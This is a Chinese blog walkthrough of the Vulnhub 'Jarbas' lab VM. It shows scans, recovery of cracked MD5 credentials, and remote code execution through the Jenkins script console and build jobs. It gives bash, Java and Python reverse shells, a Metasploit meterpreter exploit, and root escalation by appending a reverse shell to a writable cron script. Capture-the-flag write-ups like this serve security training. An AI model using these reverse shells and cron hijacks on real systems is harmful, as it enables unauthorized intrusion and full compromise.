Vulnhub系列Jarbas靶机(三种方法)

最新推荐文章于 2025-04-07 18:37:40 发布
最新推荐文章于 2025-04-07 18:37:40 发布
阅读量1.2k 收藏 23
点赞数 22
文章标签: 服务器 linux 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_80203701/article/details/134933455
版权

靶机地址:https://download.vulnhub.com/jarbas/Jarbas.zip

目录

环境配置

信息收集

IP地址扫描

 端口扫描

漏洞扫描

TCP扫描

UDP扫描

网站后台扫描

寻找上传点

(1)利用新建任务

第一步写入shell

第二步反弹root  shell

验证shell

(2)利用未授权漏洞

第一步验证

获得shell

 (3)利用python获得shell

(4)利用msfconsole

设置参数

 设置payload 

环境配置

kali和靶机全部设置为NAT模式。

信息收集

ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.234.152  netmask 255.255.255.0  broadcast 192.168.234.255
        inet6 fe80::c885:163b:7378:458e  prefixlen 64  scopeid 0x20<link>
        ether 00:0c:99:9f:c6:9f  txqueuelen 1000  (Ethernet)
        RX packets 2  bytes 585 (585.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 20  bytes 2884 (2.8 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

kali的IP地址为192.168.234.152,扫描整个C段。

IP地址扫描

 sudo nmap -sn 192.168.234.0/24

 端口扫描

sudo nmap -sV -O -p- --min-rate 10000 192.168.234.143 -oA nmapscan/ports
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-18 04:59 EST
Nmap scan report for 192.168.234.143
Host is up (0.00078s latency).
Not shown: 65531 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.4 (protocol 2.0)
80/tcp   open  http    Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
3306/tcp open  mysql   MariaDB (unauthorized)
8080/tcp open  http    Jetty 9.4.z-SNAPSHOT
MAC Address: 00:0C:29:AB:14:E9 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.80 seconds

开放了22,80,3306,8080端口这四个全是突破口。

漏洞扫描

sudo nmap --script=vuln -p22,80,3306,8080 192.168.234.143 -oA nmapscan/vuln

恩....没有什么漏洞可以利用,继续进行信息收集。

TCP扫描

sudo nmap -sT -T 4 192.168.234.143 -oA nmapscan/tcp
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-18 05:04 EST
Nmap scan report for 192.168.234.143
Host is up (0.0012s latency).
Not shown: 996 closed tcp ports (conn-refused)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
3306/tcp open  mysql
8080/tcp open  http-proxy
MAC Address: 00:0C:29:AS:14:E4 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.21 seconds

也没什么可以利用的,继续收集吧。 

UDP扫描

sudo nmap -sU -p22,80,3306,8080 192.168.234.143 -oA nmapscan/udp

什么都没有。

网站后台扫描

dirsearch -u http://192.168.234.143 -x403

记得还有个8080端口,那就继续进行扫描。

dirsearch -u http://192.168.234.143:8080 -x403,404,503

打开200状态码的网页后台,先是80端口。 

 whatweb看一下网站是什么搭建的。

whatweb http://192.168.234.143

 Apache和PHP搭建的,先记着吧。

有三个用户名和密码,有经验的话可以看出来是个MD5值。如果不知道的话可以用kali自带的辨别脚本看一下。

hash-identifier 5978a63b4654c73c60fa24f836386d87
   #########################################################################
   #     __  __                     __           ______    _____           #
   #    /\ \/\ \                   /\ \         /\__  _\  /\  _ `\         #
   #    \ \ \_\ \     __      ____ \ \ \___     \/_/\ \/  \ \ \/\ \        #
   #     \ \  _  \  /'__`\   / ,__\ \ \  _ `\      \ \ \   \ \ \ \ \       #
   #      \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \      \_\ \__ \ \ \_\ \      #
   #       \ \_\ \_\ \___ \_\/\____/  \ \_\ \_\     /\_____\ \ \____/      #
   #        \/_/\/_/\/__/\/_/\/___/    \/_/\/_/     \/_____/  \/___/  v1.2 #
   #                                                             By Zion3R #
   #                                                    www.Blackploit.com #
   #                                                   Root@Blackploit.com #
   #########################################################################
--------------------------------------------------

Possible Hashs:
[+] MD5
[+] Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))

Least Possible Hashs:
[+] RAdmin v2.x
[+] NTLM
[+] MD4
[+] MD2
[+] MD5(HMAC)
[+] MD4(HMAC)
[+] MD2(HMAC)
[+] MD5(HMAC(Wordpress))
[+] Haval-128
[+] Haval-128(HMAC)
[+] RipeMD-128
[+] RipeMD-128(HMAC)
[+] SNEFRU-128
[+] SNEFRU-128(HMAC)
[+] Tiger-128
[+] Tiger-128(HMAC)
[+] md5($pass.$salt)
[+] md5($salt.$pass)
[+] md5($salt.$pass.$salt)
[+] md5($salt.$pass.$username)
[+] md5($salt.md5($pass))
[+] md5($salt.md5($pass))
[+] md5($salt.md5($pass.$salt))
[+] md5($salt.md5($pass.$salt))
[+] md5($salt.md5($salt.$pass))
[+] md5($salt.md5(md5($pass).$salt))
[+] md5($username.0.$pass)
[+] md5($username.LF.$pass)
[+] md5($username.md5($pass).$salt)
[+] md5(md5($pass))
[+] md5(md5($pass).$salt)
[+] md5(md5($pass).md5($salt))
[+] md5(md5($salt).$pass)
[+] md5(md5($salt).md5($pass))
[+] md5(md5($username.$pass).$salt)
[+] md5(md5(md5($pass)))
[+] md5(md5(md5(md5($pass))))
[+] md5(md5(md5(md5(md5($pass)))))
[+] md5(sha1($pass))
[+] md5(sha1(md5($pass)))
[+] md5(sha1(md5(sha1($pass))))
[+] md5(strtoupper(md5($pass)))

都在暗示我们是MD5,那就解密一下吧。

免费的MD5解密网址:https://www.somd5.com/ 

5978a63b4654c73c60fa24f836386d87                         italia99                  
f463f63616cb3f1e81ce46b39f882fd5                            marianna
9b38e2b1e8b12f426b0d208a7ab6cb98                        vipsu

有可能是个网站后台的登录账号或者是ssh连接的账号密码,先记着 。

还有个8080端口,打开看看。

是个登录界面,先去看看别的后台地址。

好像一直在提示我们java,估计是要利用java相关的知识,可惜我不会(先走着看看吧)。

 

robots.txt也没有什么东西,那思路只能在那个登录界面是突破口。

 试了半天登录上去了。

账号:eder                                          密码:vipsu

 

 没见过,问问度娘去。

有个未授权访问漏洞:https://www.cnblogs.com/forforever/p/14019868.html 

那就先去看看

┌──(kali㉿kali)-[~/baji/jarbas]
└─$ searchsploit jenkins             
---------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                            |  Path
---------------------------------------------------------------------------------------------------------- ---------------------------------
CloudBees Jenkins 2.32.1 - Java Deserialization                                                           | java/dos/41965.txt
Jenkins - Script-Console Java Execution (Metasploit)                                                      | multiple/remote/24272.rb
Jenkins - XStream Groovy classpath Deserialization (Metasploit)                                           | multiple/remote/43375.rb
Jenkins 1.523 - Persistent HTML Code                                                                      | php/webapps/30408.txt
Jenkins 1.578 - Multiple Vulnerabilities                                                                  | multiple/webapps/34587.txt
Jenkins 1.626 - Cross-Site Request Forgery / Code Execution                                               | java/webapps/37999.txt
Jenkins 1.633 - Credential Recovery                                                                       | java/webapps/38664.py
Jenkins 2.137 and Pipeline Groovy Plugin 2.61 - ACL Bypass and Metaprogramming Remote Code Execution (Met | java/remote/46572.rb
Jenkins 2.150.2 - Remote Command Execution (Metasploit)                                                   | linux/webapps/46352.rb
Jenkins 2.235.3 - 'Description' Stored XSS                                                                | java/webapps/49237.txt
Jenkins 2.235.3 - 'tooltip' Stored Cross-Site Scripting                                                   | java/webapps/49232.txt
Jenkins 2.235.3 - 'X-Forwarded-For' Stored XSS                                                            | java/webapps/49244.txt
Jenkins 2.63 - Sandbox bypass in pipeline: Groovy plug-in                                                 | java/webapps/48904.txt
Jenkins < 1.650 - Java Deserialization                                                                    | java/remote/42394.py
Jenkins build-metrics plugin 1.3 - 'label' Cross-Site Scripting                                           | java/webapps/47598.py
Jenkins CI Script Console - Command Execution (Metasploit)                                                | multiple/remote/24206.rb
Jenkins CLI - HTTP Java Deserialization (Metasploit)                                                      | linux/remote/44642.rb
Jenkins CLI - RMI Java Deserialization (Metasploit)                                                       | java/remote/38983.rb
Jenkins Dependency Graph View Plugin 0.13 - Persistent Cross-Site Scripting                               | java/webapps/47111.txt
Jenkins Gitlab Hook Plugin 1.4.2 - Reflected Cross-Site Scripting                                         | java/webapps/47927.txt
Jenkins Mailer Plugin < 1.20 - Cross-Site Request Forgery (Send Email)                                    | linux/webapps/44843.py
Jenkins Plugin Script Security 1.49/Declarative 1.3.4/Groovy 2.60 - Remote Code Execution                 | java/webapps/46453.py
Jenkins Plugin Script Security < 1.50/Declarative < 1.3.4.1/Groovy < 2.61.1 - Remote Code Execution (PoC) | java/webapps/46427.txt
Jenkins Software RakNet 3.72 - Remote Integer Underflow                                                   | multiple/remote/33802.txt
SonarQube Jenkins Plugin - Plain Text Password                                                            | php/webapps/30409.txt
---------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

好像也没什么可以利用的webshell脚本,那就去问问度娘吧。 

寻找上传点

(1)利用新建任务

随便点点看,看到一个可以创建任务,应该可以写入一个反弹shell脚本。

 

好像找到了......

第一步写入shell

可以写入shell脚本,那就写入吧。

/bin/bash -i >& /dev/tcp/192.168.234.152/4443 0>&1

 

点击保存,开始利用。 

现在kali中开启反弹shell

这才是上传成功的标志。

┌──(kali㉿kali)-[~/baji/jarbas]
└─$ nc -lvvp 4443
listening on [any] 4443 ...
192.168.234.143: inverse host lookup failed: Unknown host
connect to [192.168.234.152] from (UNKNOWN) [192.168.234.143] 48202
bash: no job control in this shell
bash-4.2$ ifconfig
ifconfig
bash-4.2$ whoami
whoami
jenkins
bash-4.2$ sudo l
sudo l

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

sudo: no tty present and no askpass program specified
bash-4.2$ sudo -l
sudo -l

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

sudo: no tty present and no askpass program specified
bash-4.2$ dpkg -l
dpkg -l
bash: dpkg: command not found

搞来搞去都用不了,继续看看有没有什么系统漏洞。

bash-4.2$ uname -a
uname -a
Linux jarbas 3.10.0-693.21.1.el7.x86_64 #1 SMP Wed Mar 7 19:03:37 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
bash-4.2$

看看有什么用户吧。

bash-4.2$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
polkitd:x:999:997:User for polkitd:/:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
chrony:x:998:996::/var/lib/chrony:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
eder:x:1000:1000:Eder Luiz:/home/eder:/bin/bash
apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin
mysql:x:27:27:MariaDB Server:/var/lib/mysql:/sbin/nologin
jenkins:x:997:995:Jenkins Automation Server:/var/lib/jenkins:/bin/false

哎,有个root和jenkins但是不是/bash ,也没有什么,那看看有什么定时任务吧。

第二步反弹root  shell
bash-4.2$ cat /etc/crontab
cat /etc/crontab
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root

# For details see man 4 crontabs

# Example of job definition:
# .---------------- minute (0 - 59)
# |  .------------- hour (0 - 23)
# |  |  .---------- day of month (1 - 31)
# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...
# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# |  |  |  |  |
# *  *  *  *  * user-name  command to be executed
*/5 * * * * root /etc/script/CleaningScript.sh >/dev/null 2>&1
bash-4.2$ 

echo "/bin/bash -i >& /dev/tcp/192.168.234.152/443 0>&1" >> /etc/script/CleaningScript.sh

 换个端口进行反弹shell万一与上次的冲突就完蛋了,那就吃点东西等着反弹上来吧。

┌──(kali㉿kali)-[~]
└─$ sudo nc -lvvp 4444
[sudo] password for kali: 
listening on [any] 4444 ...
192.168.234.143: inverse host lookup failed: Unknown host
connect to [192.168.234.152] from (UNKNOWN) [192.168.234.143] 36338
bash: no job control in this shell
[root@jarbas ~]#

 等的我花都谢了.......进一步验证一下。

验证shell
192.168.234.143: inverse host lookup failed: Unknown host
connect to [192.168.234.152] from (UNKNOWN) [192.168.234.143] 49558
bash: no job control in this shell
[root@jarbas ~]# shell
shell
bash: shell: command not found
[root@jarbas ~]# sudo -l
sudo -l
Matching Defaults entries for root on jarbas:
    !visiblepw, always_set_home, match_group_by_gid, env_reset,
    env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS",
    env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE",
    env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES",
    env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE",
    env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
    secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin

User root may run the following commands on jarbas:
    (ALL) ALL
[root@jarbas ~]# cd /root
cd /root
[root@jarbas ~]# ifconfig
ifconfig
ens33: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.234.143  netmask 255.255.255.0  broadcast 192.168.234.255
        inet6 fe80::9114:a460:aa3:9dd5  prefixlen 64  scopeid 0x20<link>
        ether 00:0c:29:ab:14:e9  txqueuelen 1000  (Ethernet)
        RX packets 136533  bytes 22117080 (21.0 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 135585  bytes 78986619 (75.3 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1  (Local Loopback)
        RX packets 168  bytes 15456 (15.0 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 168  bytes 15456 (15.0 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

[root@jarbas ~]# ls   
ls
flag.txt
[root@jarbas ~]# cat flag.txt
cat flag.txt
Hey!

Congratulations! You got it! I always knew you could do it!
This challenge was very easy, huh? =)

Thanks for appreciating this machine.

@tiagotvrs 
[root@jarbas ~]#

不知道为什么这个靶机有点怪怪的,不知道是不是我搞的太多了。 

(2)利用未授权漏洞

第一步验证

验证命令

println "whoami".execute().text
println "ifconfig".execute().text

 

可以看到成功执行了,那直接反弹shell试试。

println "/bin/bash -i >& /dev/tcp/192.168.234.152/4443 0>&1".execute().text

在kali中开启监听,点击运行。(tnnd为什么不行) 

获得shell

个人喜欢棱角:https://forum.ywhack.com/shell.php

String host="192.168.234.152";
int port=4443;
String cmd="/bin/bash";
//ProcessBuilder创建操作系统进程
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s=new Socket(host,port);
InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();
OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed())
{while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());
    while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try
{p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

┌──(kali㉿kali)-[~/baji/jarbas/php]
└─$ nc -lvp 4443
listening on [any] 4443 ...
192.168.234.143: inverse host lookup failed: Unknown host
connect to [192.168.234.152] from (UNKNOWN) [192.168.234.143] 50414
whoami
jenkins
ifconfig
ens33: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.234.143  netmask 255.255.255.0  broadcast 192.168.234.255
        inet6 fe80::9114:a460:aa3:9dd5  prefixlen 64  scopeid 0x20<link>
        ether 00:0c:29:ab:14:e9  txqueuelen 1000  (Ethernet)
        RX packets 3924  bytes 3626175 (3.4 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 2335  bytes 1306274 (1.2 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1  (Local Loopback)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

不是root用户,那还是要利用第一个的定时任务提权。

 漫长的五分钟啊.............

┌──(kali㉿kali)-[~]
└─$ nc -lvvp 4444
listening on [any] 4444 ...
192.168.234.143: inverse host lookup failed: Unknown host
connect to [192.168.234.152] from (UNKNOWN) [192.168.234.143] 59072
bash: no job control in this shell
[root@jarbas ~]# ifconfig
ifconfig
ens33: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.234.143  netmask 255.255.255.0  broadcast 192.168.234.255
        inet6 fe80::9114:a460:aa3:9dd5  prefixlen 64  scopeid 0x20<link>
        ether 00:0c:29:ab:14:e9  txqueuelen 1000  (Ethernet)
        RX packets 4003  bytes 3631559 (3.4 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 2415  bytes 1313692 (1.2 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1  (Local Loopback)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

[root@jarbas ~]# cd /root
cd /root
[root@jarbas ~]# ls
ls
flag.txt
[root@jarbas ~]# cat flag.txt
cat flag.txt
Hey!

Congratulations! You got it! I always knew you could do it!
This challenge was very easy, huh? =)

Thanks for appreciating this machine.

@tiagotvrs 
[root@jarbas ~]#

 (3)利用python获得shell

#!/usr/bin/python

import socket,subprocess,os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("192.168.234.152",443));
os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);
p=subprocess.call(["/bin/sh","-i"]);

启动一个web页面 

println "wget http://192.168.234.152/reverse.py -P /tmp/".execute().text

将python脚本写入/tmp目录中。

 恩......没有成功!(这里可以利用java的反弹shell)

提权还是利用那个定时任务。这里水一下。

┌──(kali㉿kali)-[~]
└─$ sudo nc -nlvp 443
listening on [any] 443 ...
connect to [192.168.234.152] from (UNKNOWN) [192.168.234.143] 42188
ls
bin
boot
dev
etc
home
lib
lib64
media
mnt
opt
proc
root
run
sbin
srv
sys
tmp
usr
var
cat /etc/crontab
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root

# For details see man 4 crontabs

# Example of job definition:
# .---------------- minute (0 - 59)
# |  .------------- hour (0 - 23)
# |  |  .---------- day of month (1 - 31)
# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...
# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# |  |  |  |  |
# *  *  *  *  * user-name  command to be executed
*/5 * * * * root /etc/script/CleaningScript.sh >/dev/null 2>&1
echo "/bin/bash -i >& /dev/tcp/192.168.234.152/4444 0>&1" >> /etc/script/CleaningScript.sh

┌──(kali㉿kali)-[~/baji/jarbas/php]
└─$ nc -lvp 4444            
listening on [any] 4444 ...
192.168.234.143: inverse host lookup failed: Unknown host
connect to [192.168.234.152] from (UNKNOWN) [192.168.234.143] 40742
bash: no job control in this shell
[root@jarbas ~]# ls   
ls
flag.txt
[root@jarbas ~]# cat flag.txt
cat flag.txt
Hey!

Congratulations! You got it! I always knew you could do it!
This challenge was very easy, huh? =)

Thanks for appreciating this machine.

@tiagotvrs 
[root@jarbas ~]#

(4)利用msfconsole

有一个漏洞可以利用。

msf6 auxiliary(scanner/http/jenkins_login) > use 11
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp                                                                    
msf6 exploit(multi/http/jenkins_script_console) > show options
                                                                                                                                            
Module options (exploit/multi/http/jenkins_script_console):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   API_TOKEN                   no        The API token for the specified username
   PASSWORD                    no        The password for the specified username
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit
                                         .html
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /jenkins/        yes       The path to the Jenkins-CI application
   URIPATH                     no        The URI to use for this exploit (default is random)
   USERNAME                    no        The username to authenticate as
   VHOST                       no        HTTP server virtual host


   When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0
                                       .0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.234.152  yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows



View the full module info with the info, or info -d command.

 需要设置的有点多,应该多学学msfconsole这个工具。

设置参数
msf6 exploit(multi/http/jenkins_script_console) > set rhosts 192.168.234.143
rhosts => 192.168.234.143                                                                                                                   
msf6 exploit(multi/http/jenkins_script_console) > set rport 8080
rport => 8080                                                                                                                               
msf6 exploit(multi/http/jenkins_script_console) > set USERNAME eder
USERNAME => eder
msf6 exploit(multi/http/jenkins_script_console) > set PASSWORD vipsu
PASSWORD => vipsu
msf6 exploit(multi/http/jenkins_script_console) > set TARGETURI /
TARGETURI => /
msf6 exploit(multi/http/jenkins_script_console) >

参数解释:

rhosts                                                          //设置IP地址

rport                                                            //设置攻击的端口

USERNAME                                               //设置网站登录界面的用户名

PASSWORD                                              //设置网站登录界面的密码

TARGETURI                                              //设置目标目录的URI

 设置payload 
msf6 exploit(multi/http/jenkins_script_console) > show targets

Exploit targets:
=================

    Id  Name
    --  ----
=>  0   Windows
    1   Linux
    2   Unix CMD


msf6 exploit(multi/http/jenkins_script_console) > set target 1
target => 1
msf6 exploit(multi/http/jenkins_script_console) > show targets

Exploit targets:
=================

    Id  Name
    --  ----
    0   Windows
=>  1   Linux
    2   Unix CMD


msf6 exploit(multi/http/jenkins_script_console) > 

msf6 exploit(multi/http/jenkins_script_console) > set payload linux/x86/met
set payload linux/x86/meterpreter/bind_ipv6_tcp       set payload linux/x86/meterpreter/reverse_tcp
set payload linux/x86/meterpreter/bind_ipv6_tcp_uuid  set payload linux/x86/meterpreter/reverse_tcp_uuid
set payload linux/x86/meterpreter/bind_nonx_tcp       set payload linux/x86/meterpreter_reverse_http
set payload linux/x86/meterpreter/bind_tcp            set payload linux/x86/meterpreter_reverse_https
set payload linux/x86/meterpreter/bind_tcp_uuid       set payload linux/x86/meterpreter_reverse_tcp
set payload linux/x86/meterpreter/reverse_ipv6_tcp    set payload linux/x86/metsvc_bind_tcp
set payload linux/x86/meterpreter/reverse_nonx_tcp    set payload linux/x86/metsvc_reverse_tcp
msf6 exploit(multi/http/jenkins_script_console) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf6 exploit(multi/http/jenkins_script_console) > run

[*] Started reverse TCP handler on 192.168.234.152:4444 
[*] Checking access to the script console
[*] Logging in...
[*] Using CSRF token: '21a21646e7ac8b105a6402d76c5d7035' (Jenkins-Crumb style v1)
[*] 192.168.234.143:8080 - Sending Linux stager...
[*] Sending stage (1017704 bytes) to 192.168.234.143
[*] Command Stager progress - 100.00% done (763/763 bytes)
[*] Meterpreter session 1 opened (192.168.234.152:4444 -> 192.168.234.143:40752) at 2023-12-18 09:57:27 -0500

meterpreter >

进一步获得交互性shell 。

terpreter > shell
Process 1459 created.
Channel 1 created.
python -c 'import pty;pty.spawn("/bin/bash")'
bash-4.2$ 

bash-4.2$ ls  
ls
bin   dev  home  lib64  mnt  proc  run   srv  tmp  var
boot  etc  lib   media  opt  root  sbin  sys  usr
bash-4.2$ ifconfig
ifconfig
ens33: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.234.143  netmask 255.255.255.0  broadcast 192.168.234.255
        inet6 fe80::9114:a460:aa3:9dd5  prefixlen 64  scopeid 0x20<link>
        ether 00:0c:29:ab:14:e9  txqueuelen 1000  (Ethernet)
        RX packets 3398  bytes 4156139 (3.9 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 1616  bytes 923854 (902.2 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1  (Local Loopback)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

bash-4.2$

还是利用定时脚本获得root权限。 

bash-4.2$ cat /etc/crontab
cat /etc/crontab
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root

# For details see man 4 crontabs

# Example of job definition:
# .---------------- minute (0 - 59)
# |  .------------- hour (0 - 23)
# |  |  .---------- day of month (1 - 31)
# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...
# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# |  |  |  |  |
# *  *  *  *  * user-name  command to be executed
*/5 * * * * root /etc/script/CleaningScript.sh >/dev/null 2>&1
bash-4.2$ echo "/bin/bash -i /dev/tcp/192.168.234.152/4449 0>&1" >> /etc/script/CleaningScript.sh
<i /dev/tcp/192.168.234.152/4449 0>&1" >> /etc/script/CleaningScript.sh      
bash-4.2$ cat /etc/script/CleaningScript.sh
cat /etc/script/CleaningScript.sh
#!/bin/bash

rm -rf /var/log/httpd/access_log.txt
/bin/bash -i >& /dev/tcp/192.168.234.152/4444 0>&1
/bin/bash -i /dev/tcp/192.168.234.152/4449 0>&1
/bin/bash -i >& /dev/tcp/192.168.234.152/4446 0>&1


┌──(kali㉿kali)-[~]
└─$ nc -lvvp 4446
listening on [any] 4446 ...
192.168.234.143: inverse host lookup failed: Unknown host
connect to [192.168.234.152] from (UNKNOWN) [192.168.234.143] 37896
bash: no job control in this shell
[root@jarbas ~]# ifconfig
ifconfig
ens33: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.234.143  netmask 255.255.255.0  broadcast 192.168.234.255
        inet6 fe80::9114:a460:aa3:9dd5  prefixlen 64  scopeid 0x20<link>
        ether 00:0c:29:ab:14:e9  txqueuelen 1000  (Ethernet)
        RX packets 3536  bytes 4172565 (3.9 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 1722  bytes 950521 (928.2 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1  (Local Loopback)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

[root@jarbas ~]# uname -a
uname -a
Linux jarbas 3.10.0-693.21.1.el7.x86_64 #1 SMP Wed Mar 7 19:03:37 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
[root@jarbas ~]# cat /flag.txt
cat /flag.txt
cat: /flag.txt: No such file or directory
